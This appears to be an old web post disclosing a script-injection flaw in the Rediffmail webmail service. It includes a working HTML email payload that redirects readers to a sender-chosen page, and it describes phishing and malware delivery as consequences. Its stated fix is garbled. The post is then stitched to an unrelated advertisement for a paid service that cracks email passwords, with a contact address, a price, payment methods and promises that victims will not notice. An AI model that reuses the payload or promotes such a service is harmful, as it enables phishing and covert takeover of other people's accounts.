I really do not understand why I have been recieving a lot of requests
for hacking rediffmail. This article is NOT intended to help anybody hack
rediffmail (india based free online
email service) or any other email service. I personally appreciate these
free email services and I think they are doing a great job. The sole purpose
of this article is to bring this vulnerability/bug in notice of concerned
authorities as my email to feedback@rediff.co.in
and newhome@rediffmail.com (Sent:
Monday, October 28, 2002 8:36 AM Subject: Bug in rediffmail) has remained
un-answered till date.
BUG: Bug lies in rediffmail.com
not stripping out JavaScript code hidden in <img> tags. If a mail
with hidden JavaScript redirection code is sent to user, he can be redirected
to a page sender wants. As soon as the user clicks to read the mail, he
would be redirected to the page the sender wants even before the mail content
is shown. The redirection happens in the same window and the unsuspecting
user would not have slightest idea that he is now at a page that does not
belong to rediffmail.com
unless he looks at the URL bar of his browser.
CONSEQUENCES:
1.
This new page where the user will get redirected to
can be a duplicate of the login screen and user can loose his or her
password to anyone. It is very easy to trick someone using the common
"session expired, you need to login again" error to make
a user enter his password again.
2.
If this new page again redirects the user to a malformed
.eml file, Any executable that the sender has encoded in the .eml
file (Base64 encode) would execute on the user's machine(on unpatched
IE 5.5). And this can cause havoc, this can be a virus or code to
format user's hard drive or a trojan or something like Back Orifice
or ANYTHING. So user would be totally at the mercy of the sender
now. Though this bug is in Internet Explorer but the user can fall
pray to it because he was using the particular email service.
EXPLOIT:
The exploit can be a simple HTML email that has to be sent
to the target email account. This HTML email can be formed using source
edit in outlook express or using any scripting language.
<HTML>
<HEAD></HEAD>
<BODY bgColor=#ffffff>
<IMG src="java-script:window.location='http://www.any.domain.com/any.page.htm'>
<DIV><FONT face=Arial size=3>hi, you would be redirected even
before you get a chance to read this text</FONT></DIV>
</BODY>
</HTML>
FIX:
Rediffmail.com
should parse each email to replace each occurrence of "java-script"
in the email message with "java-script".
• We reserve the right to acquire more information if necessary and refuse service if the info you give to us is incorrect.
• Our charges is only 150USD / 1 cracking session
• You can send money using any of these listed below method of payment
- PayPal
- Western Union
- MoneyGram
- MoneyBookers
Only 5 Steps to get cracked your target password
1. Submit the target id to hack-email-passwords@milanorosa.com
2. After Successful Crack we will send you the proofs (Usually in 2-3 days maximum)
3. Verify proofs and if you are well satisfied then you can reply back.
4. We will send the detailed payment information after getting reply.
5. After payment confirmation we will send the original password currently used by your "target"
1. Target Email
2. Target Name
3. Your Name:
4. Your Country:
5. Reason why you need this kind of service
6. Your preffered method of payment (paypal, westernunion, moneygram or moneybookers):
You don`t have to pay anything in advance, the payment is expected only after a successfull cracking process and you are convienced that we have access at target`s account.
To proof that we have got the password, we will send you some screenshots from target`s account (inbox folder, sent items, contacts, account information page etc ).
The password we provide is the original one or in another words it is the current password that the victim is using.
We do not change the password like others competitors and we do not try to guess the answer at secret question.
The victim will not realise that he/she has been hacked since your victim will share with you the same password here is 100% discret service.
